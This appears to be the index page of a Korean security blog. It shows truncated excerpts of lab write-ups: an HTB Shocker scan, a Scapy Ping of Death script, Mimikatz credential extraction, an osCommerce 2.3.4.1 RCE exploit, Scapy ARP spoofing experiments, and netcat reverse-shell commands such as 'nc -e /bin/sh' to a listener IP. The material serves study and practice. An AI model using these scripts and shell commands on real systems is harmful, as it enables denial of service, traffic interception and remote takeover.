외로운 Nova의 작업실

OSCP 관련 머신중 하나인 shocker을 한번 공격해보겠습니다. - 구성 환경 공격자 : 10.10.14.4 타겟 : 10.10.10.56 - Nmap port 스캔을 먼저 해보겠습니다. nmap -Pn -n -p- -sV -sC -v -T4 10.10.10.56 -oA Shockerport2 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80번 포트에는 apache 웹서버가 실행중에있고, 2222번 포트에는 openSSH 시큐어쉘 서버가 실행중에 있습니다. 웹서버를 한번 방문해보겠습니다. 재밌는 그림이 있네요. 웹서버의 ..

- 서비스 거부 공격 Ping 명령을 통해 TCMP를 정상적인크기 보다 아주 크게 만들어 전송하면 MTU에의해 다수의 IP 단편화가 발생하게되는데, 이 단편화를 타겟은 재조합해야합니다. 이때 많은 부하가 발생하거나 재조합 버퍼의 오버플로우가 발생하여 정상적인 서비스를 하지 못하도록 합니다. 아래는 Ping Of Death Attack의 파이썬 코드입니다. from scapy.all import * # Define the IP address of the target target_ip = "192.168.1.1" # Create an ICMP packet with the maximum payload size max_size = 65535 icmp_packet = IP(dst=target_ip)/ICMP()/..

- 설치 https://github.com/ParrotSec/mimikatz GitHub - ParrotSec/mimikatz Contribute to ParrotSec/mimikatz development by creating an account on GitHub. github.com 위 사이트로 들어가서 다운로드하면됩니다. - 개요 Mimikatz는 사용자가 메모리 또는 Windows 운영 체제에서 암호, 해시 및 Kerberos 티켓과 같은 인증 자격 증명을 추출할 수 있는 악용 후 도구입니다. 원래 Windows 운영 체제의 보안 취약점을 입증하기 위한 개념 증명 도구로 개발되었지만 현재는 공격자와 보안 전문가 모두가 보안 평가 및 침투 테스트를 수행하는 데 일반적으로 사용됩니다. Mimikatz..

- 취약점의 원인 분석 원인은 Apache24\htdocs\oscommerce\catalog\install\templates\pages\install_4.php 파일에서 나타납니다.

- exploit 준비 exploit을 위해 윈도우 서버에 nc64 프로그램을 깔았고, 포트도 8989를 열어두었습니다. 이제 서버를 시작합니다. - exlpoit 이제 칼리리눅스로 가서 exploit db 안의 내용을 수정합니다. 아래처럼 말입니다. 이제 실제 파이썬을 실행해줍니다. 그리고 메시지에 적힌대로 configure.php에 접속해줍니다. 이제 칼리리눅스로 nc를 사용해 직접 접속해줍니다. 실제로 서버에 접속하여 exploit 한 것을 확인할 수 있습니다.

- 실험 과정 희생자의 arp cache table에서 기본 게이트웨이 MAC 주소를 공격자가 만든 dns 서버의 MAC 주소로 주고 스니핑을 해보겠습니다. - 실험 구성 공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1 희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05 공격자의 dns : centos 192.168.219.100, 00:0C:29:CD:9A:77 - 실험 전 잘 실행되고 있는지 확인해보겠습니다. 잘 실행됨을 알 수 있습니다. from scapy.all import * import time # ARP 응답 패킷 생성 arp_reply = Ether(dst='00:0C:29:8C:2E:05')/ARP(op='is-a..

- 실험 내용 희생자의 기본 게이트웨이 MAC 주소를 공격자의 MAC주소로 바꾸고 공격자는 wireshark를 통해 패킷을 스니핑할 수 있는 지 확인합니다. - 실험 구성 공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1 희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05 원래 대상자 : centos 192.168.219.100, 00:0C:29:CD:9A:77 - 실험 전 희생자의 ARP 캐시 테이블 - 실험 시작 아래 파이썬 코드로 기본 게이트웨이 MAC을 공격자 MAC으로 변경해줍니다. from scapy.all import * import time # ARP 응답 패킷 생성 arp_reply = Ether(dst='00:0C..

- 취약점 ARP Reply응답을 인증하지않고 그대로 받아들이는 취약점을 이용합니다. - 실험 주제 ARP Spooping 당한 희생자는 MAC에따라서 공격자에게 연결이 될까 아니면 IP에따라서 원래 대상자에게 될까? - 실험 구성 공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1 희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05 원래 대상자 : centos 192.168.219.100, 00:0C:29:CD:9A:77 - 실험 전 192.168.219.120 희생자의 arp cache table 맥번호와 IP가 잘 구성되어있는 것을 확인할 수 있습니다. - 실험계획 1. ARP spooping으로 192.168.219.100의 ..

- nc nc는 바인드 쉘과 리버스 쉘을 할때 많이 사용되는 프로그램입니다. 보통 리눅스에서는 기본으로 설치되어있지만 윈도우는 따로 설치해주셔야합니다. 아래 링크로 들어가서 설치할 수 있습니다. https://eternallybored.org/misc/netcat/ - nc 사용법 nc 192.168.200.1 7979:192.168.200.1에 7979포트에 접속합니다. nc -l -p 7979:7979포트에 listen합니다. nc -e /bin/sh 192.168.220.1 7979 : 192.168.220.1 ip에 7979포트로 쉘프로그램을 연결합니다. nc64 192.132.123.123 -e cmd.exe 7979 : 192.132.123.123 ip에 7979포트로 쉘프로그램을 연결합니다...

- osCommerce 2.3.4.1 - Remote Code Execution oscommerce는 장바구니가 있는 쇼핑몰을 만들때 사용하는 오픈소스 웹 소스입니다. 아파치를 설치하고 그 아파치위에 oscommerce 소스를 넣으면 손쉽게 웹 형태로 쇼핑몰을 만들 수 있습니다. 마치 네이버 스마트스토어와 같이 말입니다. 해당 취약점은 관리자가 oscommerce를 설치하고 install.php를 삭제하지 않은 경우에 일어납니다. 익스플로잇 코드는 아래와 같습니다. # Exploit Title: osCommerce 2.3.4.1 Remote Code Execution # Date: 29.0.3.2018 # Exploit Author: Simon Scannell - https://scannell-infos..